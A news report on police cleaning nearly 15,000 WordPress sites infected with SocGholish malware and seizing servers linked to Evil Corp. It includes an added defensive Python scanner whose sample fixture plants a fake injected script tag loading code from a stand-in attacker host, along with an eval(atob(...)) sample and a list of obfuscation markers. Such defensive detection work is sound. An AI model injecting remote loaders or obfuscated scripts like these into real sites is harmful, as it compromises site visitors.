Police clean 15,000 Evil Corp-linked SocGholish malware sites

Summary
– Law enforcement cleaned nearly 15,000 WordPress websites infected with SocGholish malware and took down over 100 servers linked to Evil Corp as part of Operation Endgame.
– Authorities from the Netherlands, Canada, the U.S., and Germany removed malware from 14,971 compromised sites and took offline 106 servers and domains.
– Dutch police advised website owners to change credentials, enable multi-factor authentication, delete unknown accounts, and keep WordPress updated.
– SocGholish is a JavaScript-based malware downloader active since 2017 that hijacks legitimate WordPress sites to trick users into installing fake browser updates.
– Evil Corp, a Russian cybercrime group active since 2007, has used SocGholish to deploy malware like Dridex and ransomware such as WastedLocker.
International law enforcement has cleaned nearly 15,000 compromised WordPress websites and taken offline over 100 servers linked to the SocGholish botnet and the notorious Russian cybercrime group Evil Corp. This coordinated crackdown, supported by Europol and Eurojust, is the latest phase of Operation Endgame, a sweeping global initiative aimed at crippling key infection chains used by high-profile cybercriminal networks.
Authorities from the Netherlands (NHCTU), Canada (RCMP), the United States (FBI), and Germany (BKA) cleaned SocGholish malware infections from 14,971 hijacked WordPress sites. In addition, they seized control of 106 servers and domains that powered the botnet. The Dutch police not only removed the malware and backdoors from infected sites but also urged website owners to change their credentials, enable multi-factor authentication, delete unknown WordPress accounts, and keep their platforms updated.
“With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware,” said Maikel Rollman of the Netherlands’ National High Tech Crime Unit. “It also reduces the risk that these systems are used for cyber-attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish.”
First documented in attacks dating back to at least 2017, the SocGholish JavaScript-based malware downloader, also tracked as FakeUpdates and GhoLoader, operates by hijacking legitimate websites, primarily those running WordPress, and tricking visitors into downloading malicious payloads disguised as fake browser updates. Once a user installs the bogus update, the malware establishes a connection with attackers, granting them remote access to the infected system. SocGholish has also been used as a delivery mechanism for other malware families, including Dridex, Doppelpaymer, Empire, Koadic, Chtonic, and Azorult.
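The infection the article describes starts with script injected into pages served by a legitimate WordPress site. The scanner below is an added example, not the article's content and not tooling used by the Dutch police or any other agency in Operation Endgame. It walks a document root, flags script tags whose src points to a host other than the site's own, and flags inline scripts showing common obfuscation markers. The sample tree, the hostnames (example-site.test, cdn.attacker-controlled.test) and the marker list are constructed assumptions for illustration, not indicators tied to SocGholish.

```python
"""Heuristic scan of a WordPress document root for injected script tags.

Added example: generic post-cleanup check, not taken from the article or from
any law-enforcement tooling. All hosts, paths and patterns below are assumptions.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

# <script ... src="..."> tags; host is compared against the site's own hosts
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
# inline <script> bodies (tags without a src attribute)
INLINE_SCRIPT_RE = re.compile(r'<script(?![^>]*\ssrc=)[^>]*>(.*?)</script>', re.IGNORECASE | re.DOTALL)
# assumed obfuscation markers; legitimate code can use these too, so treat hits as leads
OBFUSCATION_MARKERS = ("eval(", "atob(", "String.fromCharCode", "unescape(", "document.write(")
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js"}


def external_script_hosts(text, own_hosts):
    """Return hostnames of script src attributes that are not in own_hosts."""
    hosts = []
    for src in SCRIPT_SRC_RE.findall(text):
        if src.startswith("//"):          # protocol-relative URL
            src = "https:" + src
        host = urlparse(src).hostname
        if host and host.lower() not in own_hosts:
            hosts.append(host.lower())
    return hosts


def suspicious_inline_scripts(text):
    """Return one record per inline script containing markers or a long opaque string."""
    hits = []
    for body in INLINE_SCRIPT_RE.findall(text):
        markers = [m for m in OBFUSCATION_MARKERS if m in body]
        long_string = re.search(r'["\'][A-Za-z0-9+/=]{200,}["\']', body) is not None
        if markers or long_string:
            hits.append({"markers": markers, "long_string": long_string})
    return hits


def scan_tree(root, own_hosts):
    """Walk root and return findings for files with off-site or obfuscated scripts."""
    findings = []
    own = {h.lower() for h in own_hosts}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                text = f.read()
            ext_hosts = external_script_hosts(text, own)
            inline = suspicious_inline_scripts(text)
            if ext_hosts or inline:
                findings.append({
                    "path": os.path.relpath(path, root),
                    "external_hosts": ext_hosts,
                    "inline": inline,
                })
    return findings


def build_sample_site():
    """Constructed WordPress-like tree: one clean theme file and one with an injected tag."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    theme = os.path.join(root, "wp-content", "themes", "demo")
    os.makedirs(theme)
    with open(os.path.join(theme, "header.php"), "w") as f:
        f.write('<html><head>\n'
                '<script src="https://example-site.test/wp-includes/js/jquery.js"></script>\n'
                '</head>')
    with open(os.path.join(theme, "footer.php"), "w") as f:
        f.write('<footer></footer>\n'
                '<script src="//cdn.attacker-controlled.test/loader.js"></script>\n'
                '<script>eval(atob("' + "QUJD" * 60 + '"));</script>\n'
                '</html>')
    with open(os.path.join(root, "readme.txt"), "w") as f:
        f.write("not scanned")
    return root


if __name__ == "__main__":
    site_root = build_sample_site()
    for finding in scan_tree(site_root, {"example-site.test"}):
        print(finding)
```

Run against a real install, pass the site's own hostnames (and any CDN it legitimately loads from) as own_hosts and review every hit by hand; the script reports leads, not verdicts. Injected content can also live in the database (post bodies, widgets, options), which this file scan does not cover.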
This malware has long been tied to Evil Corp, a Russian cybercrime syndicate active since 2007. The group is infamous for developing the Zeus and Dridex malware families and orchestrating ransomware operations such as WastedLocker, Hades, Macaw Locker, and Phoenix CryptoLocker.
In November, as part of Operation Endgame, law enforcement also dismantled over 1,000 servers used by the Rhadamanthys, VenomRAT, and Elysium botnet malware operations. Previous phases of Operation Endgame have targeted ransomware infrastructure, Smokeloader botnet customers and servers, the AVCheck site, and a range of other major malware operations, including DanaBot, IcedID, Pikabot, Trickbot, Bumblebee, and SystemBC.
(Source: BleepingComputer)